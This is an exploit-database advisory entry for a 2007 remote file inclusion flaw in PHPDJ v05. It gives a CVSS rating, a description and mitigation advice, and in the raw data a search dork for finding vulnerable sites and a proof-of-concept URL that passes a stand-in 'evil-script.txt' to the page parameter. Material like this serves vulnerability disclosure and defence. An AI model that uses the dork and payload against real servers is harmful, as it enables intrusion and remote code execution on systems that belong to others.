header-logo
Suggest Exploit
vendor:
PHPDJ
by:
Unknown
5.5
CVSS
MEDIUM
Remote File Inclusion
CWE
Product Name: PHPDJ
Affected Version From: PHPDJ v05
Affected Version To: PHPDJ v05
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHPDJ v05 (page) Remote File Inclusion Vulnerability

The PHPDJ v05 (page) is vulnerable to remote file inclusion. By exploiting this vulnerability, an attacker can include a malicious file from a remote server, which can lead to remote code execution or other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to update PHPDJ to the latest version and sanitize user input before including any files.
Source

Exploit-DB raw data:

################################################################
PHPDJ v05 (page) Remote File Inclusion Vulnerability
D.S: http://sourceforge.net/projects/phpdj/
D0RK : allintext:"PHPDJ was created by www.php-mania.co.uk"
POC :
       /PHPDJ_v05/dj/djpage.php?page=evil-script.txt?
################################################################
Thanx To : Tryag.Com/cc & Asb-May.net/bb
################################################################

# milw0rm.com [2007-10-17]

Navigation

Suggest Exploit

Services By CQR